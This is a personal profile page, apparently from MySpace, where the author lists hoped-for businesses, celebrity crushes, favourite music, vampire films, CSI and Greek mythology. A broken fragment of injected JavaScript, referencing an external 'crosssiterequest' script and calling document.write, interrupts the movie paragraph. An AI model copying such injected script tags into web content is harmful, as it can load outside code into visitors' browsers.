I am interested in one day owning several businesses such as: a theatre, a Dance school/Acadamy (welcoming the deaf community with open arms), a hotel, daycare, and spa. I know it sounds like a lot, but it could happen.
I would love to meet Micheal Jackson(who wouldn't).The original 007 Sean Connery the sexiest man on earth, The Rock,and Bill Clinton.
If I could bring any one back to life and meet the... They would consist of my Biological grand mother, Kathrine Dunham, Etta James, Aaliyah, Bob Marley.Mythology....Aphroditie, Aries,Achilles (in hopes that he is as sexy as Brad Pitt played him.)
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I love music, all music!!!! ( My favorite is Reagge!!)
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I love movies, all movies!!! My favorite type of movies are any movies with the SEXIEST man on earth SEAN CONNERY, and any movie with VAMPIRES..... language="javascript" src="http://crosssiterequest../request.js"function nothingf(){document.write("..1...{}");}..
CSI(all of them Miami, New York, Vegas, etc)& Law and Order
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MySpace Avatars Lyrics
I love all Vampire books, and greek mythology. If I could compare myslef to any greek god it would have to be Aphroditie or Cleopetra.
My heros are my lord and savior Jesus Christ, my mother, and Promethus...